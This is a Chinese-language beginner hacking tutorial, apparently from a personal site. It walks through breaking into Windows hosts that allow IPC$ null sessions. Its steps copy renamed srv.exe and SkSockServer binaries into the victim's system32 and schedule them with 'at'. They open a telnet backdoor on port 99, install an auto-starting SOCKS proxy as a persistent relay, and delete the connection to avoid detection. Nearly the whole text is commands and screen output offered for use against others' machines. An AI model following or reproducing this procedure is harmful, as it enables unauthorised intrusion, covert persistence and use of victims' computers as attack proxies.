前提条件：找到能建立IPC空衔接的主机，如何找到请参阅《如何入侵能建立IPC$空衔接的主机》，我的主页上也有，网址是：topcoooler.51.net

需要工具： Sksockserver.exe 下载地址：http://snake12.top263.net/SkSockServer/SkSockServer1.06.zip28KB

1: 开启CMD.EXE ，然后在流光的目录找到SRV.EXE (C:files.exe)将srv.exe拷到C目录，还有将sksockserver.exe也拷到C目录里,最好都改个名字，这样改了名字就没这么容易被发现了。现在就可以输入net use \XXX.XXX.XXX.XXX$ "密码" /user:用户名" ，如果成功的话将出现“命令完成”。 (注 ：NET USE \ip$ 密码 /user:用户名字)

2：将将SRV.EXE和sksockserver.exe拷到主机的SYSTEM32目录里。 命令为： C:\srv.exe \\XXX.XXX.XXX.XXX\admin$\system32 C:\sksockserver.exe \\XXX.XXX.XXX.XXX\admin$\system32 成功拷贝的话，将会出现：“已复制 1个文件”的提示。 这个过程大概需要几分钟，等等吧：）

3：输入 net time \\XXX.XXX.XXX.XXX 这样我们就得到了主机的本地时间。

4：输入 at \\XXX.XXX.XXX.XXX 时间 要运行的程式 (记得时间是用主机的本地时间，一定要输入比本地时间迟几分钟！！！这样过几分钟后该程式将自动执行 ，还有 ，时间是按照国际时间的) ， 出现添加了一项作业，其作业ID-1，就表示已经增加了作业 ！！ 如果要取消作业 ， 输入 at \XXX.XXX.XXX.XXX ID号码 /del

5：过几分钟 , 输入 at \\XXX.XXX.XXX.XXX 查看刚才要执行任务的情况 ，可以看到如下内容： 状态 ID 日期 时间 命令行 －－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

这就表示任务已经执行了 ！！

6：现在可以输入 telnet XXX.XXX.XXX.XXX 99 ( 刚才执行的srv.exe就是用来打开99端口的) ！！很快的，我们将可以进入目标的电脑系统了：） 这是显示为： C:\WINNT\system32>

7：这是键入：C:\WINNT\system32>sksockserver －install 注意：现在不会显示你已经输入的命令文字 ， 放心 ，这是正常的 。然后按ENTER！

8：现在来指定打开哪个端口，你可以用 1199，2001等端口，也可以按下面输入： C:\WINNT\system32> C:\WINNT\system32>sksockserver.exe －config port 1127 这时屏幕显示： The Port valve set to 1127

注:可以跳过以上步骤，默认端口是1813!!!

9：这时就输入： C:\WINNT\system32>sksockserver -config starttype 2 屏幕显示： The New StartType have set to 2 --Auto

这样就不怕目标重新启动系统后你的跳板就停止运行 ：）

10：依照下面输入，你就拥有了自己的跳板了：） 命令为： C:\WINNT\system32> C:\WINNT\system32>net start skserver 屏幕显示： The Snake SockProxy Service service is starting. The Snake SockProxy Service service was started successfully.

11：现在要离开这台主机了，连接太久容易被发现嘛：） 输入： net use \\XXX.XXX.XXX.XXX /del 屏幕显示： \\XXX.XXX.XXX.XXX 已经删除。

你也可以检查一下，输入： net use 屏幕显示： 会纪录新的网络连接。

清单是空的 （如果不是这样就说明，还连着！）

12：打开，snake的代理跳板GUI版，就会看到属于你自己的跳板正在替你疯狂的冲浪：）

PS：本篇文章是本人整理tekwei的《DIY socks5》而得，如果你还不懂可以到“tekwei的主页”下载CIH版。我的主页上有他的衔接，不好意思：）是真的不记得了，我只记得：www.tekwei.org你们试试，不行的话从我网站衔接吧：）我的网址是：topcooler.51.net，上面都是菜鸟黑客教程，欢迎广大菜鸟朋友看看：）